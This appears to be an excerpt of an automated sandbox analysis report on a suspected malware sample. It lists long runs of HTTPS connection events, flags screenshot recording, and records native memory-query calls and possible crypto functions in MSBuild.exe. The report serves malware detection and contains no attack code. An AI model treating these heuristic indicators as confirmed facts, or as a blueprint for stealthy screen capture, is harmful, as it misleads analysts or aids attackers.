Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53755
Source: unknown	Network traffic detected: HTTP traffic on port 53777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53876
Source: unknown	Network traffic detected: HTTP traffic on port 53664 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53874
Source: unknown	Network traffic detected: HTTP traffic on port 53791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53880
Source: unknown	Network traffic detected: HTTP traffic on port 53721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53801
Source: unknown	Network traffic detected: HTTP traffic on port 53816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53808
Source: unknown	Network traffic detected: HTTP traffic on port 53860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53806
Source: unknown	Network traffic detected: HTTP traffic on port 53883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53805
Source: unknown	Network traffic detected: HTTP traffic on port 53839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53800
Source: unknown	Network traffic detected: HTTP traffic on port 53768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53809
Source: unknown	Network traffic detected: HTTP traffic on port 53651 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53813
Source: unknown	Network traffic detected: HTTP traffic on port 53697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53817
Source: unknown	Network traffic detected: HTTP traffic on port 53733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53811
Source: unknown	Network traffic detected: HTTP traffic on port 53662 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53810
Source: unknown	Network traffic detected: HTTP traffic on port 53895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53709
Source: unknown	Network traffic detected: HTTP traffic on port 53734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53827
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53701
Source: unknown	Network traffic detected: HTTP traffic on port 53663 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53820
Source: unknown	Network traffic detected: HTTP traffic on port 53827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53837
Source: unknown	Network traffic detected: HTTP traffic on port 53838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53713
Source: unknown	Network traffic detected: HTTP traffic on port 53756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53719
Source: unknown	Network traffic detected: HTTP traffic on port 53861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53838
Source: unknown	Network traffic detected: HTTP traffic on port 53700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53830
Source: unknown	Network traffic detected: HTTP traffic on port 53767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53683
Source: unknown	Network traffic detected: HTTP traffic on port 53906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53687
Source: unknown	Network traffic detected: HTTP traffic on port 53850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53693
Source: unknown	Network traffic detected: HTTP traffic on port 53896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53690
Source: unknown	Network traffic detected: HTTP traffic on port 53873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53655 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53694
Source: unknown	Network traffic detected: HTTP traffic on port 53758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53699
Source: unknown	Network traffic detected: HTTP traffic on port 53666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53698
Source: unknown	Network traffic detected: HTTP traffic on port 53826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53667 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53649
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53648
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53647
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53641
Source: unknown	Network traffic detected: HTTP traffic on port 53736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53761
Source: unknown	Network traffic detected: HTTP traffic on port 53759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53640
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53646
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53645
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53764
Source: unknown	Network traffic detected: HTTP traffic on port 53665 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53885
Source: unknown	Network traffic detected: HTTP traffic on port 53802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53770
Source: unknown	Network traffic detected: HTTP traffic on port 53771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53890
Source: unknown	Network traffic detected: HTTP traffic on port 53863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53659
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53658
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53779
Source: unknown	Network traffic detected: HTTP traffic on port 53836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53653
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53652
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53651
Source: unknown	Network traffic detected: HTTP traffic on port 53702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53650
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53657
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53656
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53655
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53654
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53896
Source: unknown	Network traffic detected: HTTP traffic on port 53907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53780
Source: unknown	Network traffic detected: HTTP traffic on port 53874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53669
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53664
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53663
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53662
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53661
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53668
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53667
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53666
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53665
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53786
Source: unknown	Network traffic detected: HTTP traffic on port 53792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53671
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53670
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53791
Source: unknown	Network traffic detected: HTTP traffic on port 53714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53790
Source: unknown	Network traffic detected: HTTP traffic on port 53747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53675
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53674
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53679
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53678
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53677
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53676
Source: unknown	Network traffic detected: HTTP traffic on port 53824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53681
Source: unknown	Network traffic detected: HTTP traffic on port 53770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53680
Source: unknown	Network traffic detected: HTTP traffic on port 53654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53669 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53646 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53670 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53647 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53876 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53640 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53641 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53658 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53878 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_00411F55

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	3_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	3_2_6CBCED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC0B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CC0B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC0B8C0 rand_s,NtQueryVirtualMemory,	3_2_6CC0B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC0B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6CC0B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBAF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CBAF280

Detected potential crypto function

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F2021	0_2_008F2021
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094A1BB	0_2_0094A1BB
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F729C	0_2_008F729C
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0090D39B	0_2_0090D39B
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0093E36F	0_2_0093E36F
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_009364F5	0_2_009364F5
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0093945D	0_2_0093945D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094A559	0_2_0094A559
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_009386FD	0_2_009386FD
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0090572C	0_2_0090572C
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094A92B	0_2_0094A92B
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008FCAF2	0_2_008FCAF2
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0090BB36	0_2_0090BB36
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00903C92	0_2_00903C92
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094AD13	0_2_0094AD13
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00949D26	0_2_00949D26
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F1D79	0_2_008F1D79
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008FFEF0	0_2_008FFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041C585	3_2_0041C585
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041B825	3_2_0041B825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042DA53	3_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042D2E3	3_2_0042D2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042CE4E	3_2_0042CE4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041961D	3_2_0041961D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042DE3B	3_2_0042DE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042D681	3_2_0042D681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBA35A0	3_2_6CBA35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB6C80	3_2_6CBB6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE6CF0	3_2_6CBE6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBAD4E0	3_2_6CBAD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC034A0	3_2_6CC034A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC0C4A0	3_2_6CC0C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCD4D0	3_2_6CBCD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB64C0	3_2_6CBB64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC1545C	3_2_6CC1545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE5C10	3_2_6CBE5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBF2C10	3_2_6CBF2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC1AC00	3_2_6CC1AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC1542B	3_2_6CC1542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB5440	3_2_6CBB5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC085F0	3_2_6CC085F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE0DD0	3_2_6CBE0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCED10	3_2_6CBCED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBD0512	3_2_6CBD0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBBFD00	3_2_6CBBFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC176E3	3_2_6CC176E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBC5E90	3_2_6CBC5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC0E680	3_2_6CC0E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBABEF0	3_2_6CBABEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBBFEF0	3_2_6CBBFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC04EA0	3_2_6CC04EA0
